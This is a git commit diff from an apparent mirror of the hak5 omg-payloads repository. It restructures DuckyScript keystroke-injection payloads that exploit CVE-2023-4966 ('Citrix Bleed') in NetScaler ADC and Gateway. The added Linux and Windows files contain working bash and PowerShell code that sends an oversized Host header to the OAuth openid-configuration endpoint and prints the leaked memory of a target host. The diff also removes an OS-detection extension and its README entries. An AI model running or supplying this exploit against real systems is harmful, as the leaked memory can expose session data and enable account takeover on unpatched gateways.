mirror of https://github.com/hak5/omg-payloads.git
Removing the CapsLock Error
parent
973cb19020
commit
0933d313fb
|
@ -55,11 +55,6 @@ The sole configuration parameter that requires modification is the hostname, whi
|
|||
DEFINE #HOSTNAME 192.168.1.200
|
||||
```
|
||||
|
||||
## DuckyScript Extensions Used
|
||||
|
||||
- **DETECT_READY**: Extension used to check whether the machine is ready to execute the payload without making unnecessary waits. [[2](#sources)]
|
||||
- **PASSIVE_WINDOWS_DETECT**: Extension used to check which operating system you are operating on so that you have a valid tool for both Windows and different systems, for instance GNU/Linux systems. [[3](#sources)]
|
||||
|
||||
## Payload Description Windows
|
||||
|
||||
In this line, a variable named `$header_value` is created, containing a string of 24576 'a' characters. This variable represents the value to be used in the HTTP header.
|
||||
|
@ -172,9 +167,6 @@ After assigning execute permissions, the above command allows the user to run th
|
|||
## Sources
|
||||
|
||||
- [1] Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
|
||||
- [2] Detect Rady: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
|
||||
- [3] Passive Windows Detect: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
|
||||
- [4] Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/
|
||||
|
||||
## Credits
|
||||
|
||||
|
@ -196,4 +188,4 @@ After assigning execute permissions, the above command allows the user to run th
|
|||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
||||
</div>
|
||||
|
|
|
@ -0,0 +1,33 @@
|
|||
REM ################################################################################
|
||||
REM # #
|
||||
REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
|
||||
REM # Author : Aleff #
|
||||
REM # Version : 1.0 #
|
||||
REM # Category : incident-response #
|
||||
REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
|
||||
REM # #
|
||||
REM ################################################################################
|
||||
|
||||
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
|
||||
DEFINE #HOSTNAME example
|
||||
|
||||
DEALY 2000
|
||||
CTRL-ALT t
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_BLOCK
|
||||
header_value=$(yes a | head -n 24576 | tr -d '\n')
|
||||
|
||||
headers="-H 'Host:$header_value'"
|
||||
|
||||
response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
|
||||
|
||||
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
|
||||
echo "--- Dumped memory ---"
|
||||
echo "$response" | cut -c 131051-
|
||||
echo "The #HOSTNAME is vulnerable!"
|
||||
echo "--- End ---"
|
||||
else
|
||||
echo "Could not dump memory"
|
||||
fi
|
||||
END_STRINGLN
|
|
@ -1,102 +0,0 @@
|
|||
REM ################################################################################
|
||||
REM # #
|
||||
REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
|
||||
REM # Author : Aleff #
|
||||
REM # Version : 1.0 #
|
||||
REM # Category : incident-response #
|
||||
REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
|
||||
REM # #
|
||||
REM ################################################################################
|
||||
|
||||
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
|
||||
DEFINE #HOSTNAME example
|
||||
|
||||
REM Detect what in what OS is running the payload
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
END_EXTENSION
|
||||
|
||||
|
||||
REM Payload content
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
|
||||
REM Open a powershell
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_BLOCK
|
||||
$header_value = 'a' * 24576
|
||||
$header_value = $header_value -replace "\n", ""
|
||||
|
||||
$headers="-H 'Host:$header_value'"
|
||||
|
||||
$headers = @{
|
||||
'Host' = $header_value
|
||||
}
|
||||
$uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
|
||||
$response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
|
||||
|
||||
if ($response.Substring(0, 3) -eq "200") {
|
||||
Write-Host "--- Dumped memory ---"
|
||||
$response.Substring(131050) # 131051 - 1
|
||||
Write-Host "The #HOSTNAME is vulnerable!"
|
||||
Write-Host "--- End ---"
|
||||
} else {
|
||||
Write-Host "Could not dump memory"
|
||||
}
|
||||
END_STRINGLN
|
||||
ELSE
|
||||
CTRL-ALT t
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_BLOCK
|
||||
header_value=$(yes a | head -n 24576 | tr -d '\n')
|
||||
|
||||
headers="-H 'Host:$header_value'"
|
||||
|
||||
response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
|
||||
|
||||
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
|
||||
echo "--- Dumped memory ---"
|
||||
echo "$response" | cut -c 131051-
|
||||
echo "The #HOSTNAME is vulnerable!"
|
||||
echo "--- End ---"
|
||||
else
|
||||
echo "Could not dump memory"
|
||||
fi
|
||||
END_STRINGLN
|
||||
END_IF
|
|
@ -0,0 +1,42 @@
|
|||
REM ################################################################################
|
||||
REM # #
|
||||
REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
|
||||
REM # Author : Aleff #
|
||||
REM # Version : 1.0 #
|
||||
REM # Category : incident-response #
|
||||
REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
|
||||
REM # #
|
||||
REM ################################################################################
|
||||
|
||||
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
|
||||
DEFINE #HOSTNAME example
|
||||
|
||||
REM Open a powershell
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_BLOCK
|
||||
$header_value = 'a' * 24576
|
||||
$header_value = $header_value -replace "\n", ""
|
||||
|
||||
$headers="-H 'Host:$header_value'"
|
||||
|
||||
$headers = @{
|
||||
'Host' = $header_value
|
||||
}
|
||||
$uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
|
||||
$response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
|
||||
|
||||
if ($response.Substring(0, 3) -eq "200") {
|
||||
Write-Host "--- Dumped memory ---"
|
||||
$response.Substring(131050) # 131051 - 1
|
||||
Write-Host "The #HOSTNAME is vulnerable!"
|
||||
Write-Host "--- End ---"
|
||||
} else {
|
||||
Write-Host "Could not dump memory"
|
||||
}
|
||||
END_STRINGLN
|
Loading…
Reference in New Issue